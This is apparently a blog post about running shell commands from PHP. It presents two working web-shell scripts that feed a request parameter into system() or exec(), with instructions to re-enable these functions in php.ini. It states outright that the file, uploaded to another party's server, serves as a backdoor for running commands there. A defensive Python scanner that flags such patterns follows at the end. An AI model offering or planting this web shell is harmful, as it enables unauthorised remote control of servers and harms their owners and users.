PHP: executing cmd/shell commands (a small Trojan backdoor)

To execute shell commands from PHP, you can use the following functions:

string system ( string $command [, int &$return_var ] )
 
string exec ( string $command [, array &$output [, int &$return_var ]] )
 
void passthru ( string $command [, int &$return_var ] )

These three functions are all disabled by default.

To use them, first edit the PHP configuration file php.ini: find the disable_functions directive and delete these function names from it.

Then remember to restart Apache.

 

First look at system() and passthru(); the two functions are similar and can be used interchangeably:

<?php
    # Read the command from the request parameter
    $shell = $_REQUEST['shell'];
    echo "<pre>";
    system($shell, $status);
    echo "</pre>";
    // The exit status reflects the result of the shell command: non-zero means it failed, zero means it succeeded
    $shell = "<font color='red'>$shell</font>";
    if( $status ){
        echo "The execution of the shell command {$shell} failed";
    } else {
        echo "The shell command {$shell} was successfully executed";
    }
?>


Request the page's address and pass the shell parameter:

http://localhost:81/shell.php?shell=ipconfig

Note that system() prints the command's output as soon as the shell command has run. This is inconvenient, because sometimes the output should not be shown immediately, or not shown at all; in that case use exec().

  

  Example of using exec(): 

<?php
    $shell = $_REQUEST['shell'];
    exec($shell, $result, $status);
    $shell = "<font color='red'>$shell</font>";
    echo "<pre>";
    if( $status ){
        echo "The execution of the shell command {$shell} failed";
    } else {
        echo "The shell command {$shell} was successfully executed, and the result is as follows<hr>";
        print_r( $result );
    }
    echo "</pre>";
?>


exec() runs the shell command but does not print its output; the output lines are collected in $result, and you need an output statement to display them.

 

Used as a small backdoor, the file is uploaded to the website directory on the other party's server; visiting its address then lets you execute the command you want on the target machine and get the result echoed back.
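Because both scripts pass a request parameter straight into a command-execution function, the pattern can be searched for in a web root. The following Python heuristic is an added example, not code from the original post: it flags PHP lines where request data reaches system(), exec() or passthru(), directly or through a variable. It goes beyond the page by also covering shell_exec(), popen() and proc_open(); the name find_tainted_calls and the sample input are constructed for illustration.

```python
import re

# The page's three functions plus other real PHP shell-spawning functions
# (the extra three are an addition here, not from the page).
SINKS = ("system", "exec", "passthru", "shell_exec", "popen", "proc_open")
SOURCE_RE = re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE)\b")
VAR_RE = re.compile(r"\$\w+")
ASSIGN_RE = re.compile(r"(\$\w+)\s*=(?!=)\s*(.*)")
# The lookbehind skips look-alikes such as curl_exec(), $db->exec(), Foo::exec().
CALL_RE = re.compile(r"(?<![\w$>:])(" + "|".join(SINKS) + r")\s*\((.*)\)")

def find_tainted_calls(php_source):
    """Return (line_no, function, reason) for sink calls fed by request data."""
    tainted, findings = set(), []
    for no, raw in enumerate(php_source.splitlines(), 1):
        code = raw.strip()
        if code.startswith(("//", "#", "*")):  # skip comment-only lines
            continue
        for m in CALL_RE.finditer(code):
            func, args = m.group(1), m.group(2)
            if SOURCE_RE.search(args):
                findings.append((no, func, "request data passed directly"))
                continue
            hits = [v for v in VAR_RE.findall(args) if v in tainted]
            if hits:
                findings.append((no, func, "tainted variable " + hits[0]))
        a = ASSIGN_RE.match(code)
        if a:  # propagate or clear taint on simple one-line assignments
            var, rhs = a.groups()
            if SOURCE_RE.search(rhs) or any(v in tainted for v in VAR_RE.findall(rhs)):
                tainted.add(var)
            else:
                tainted.discard(var)
    return findings

# Constructed sample input modelled on the page's shell.php.
SAMPLE = r"""<?php
$shell = $_REQUEST['shell'];
system($shell, $status);
$shell = "uptime";
exec($shell, $out, $rc);
curl_exec($ch);
passthru($_REQUEST['shell']);
"""

if __name__ == "__main__":
    for line_no, func, reason in find_tainted_calls(SAMPLE):
        print(f"line {line_no}: {func}() <- {reason}")
```

The taint tracking is line-based and only follows simple assignments, so treat a hit as a lead for manual review rather than a verdict.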


Origin blog.51cto.com/13687405/2572938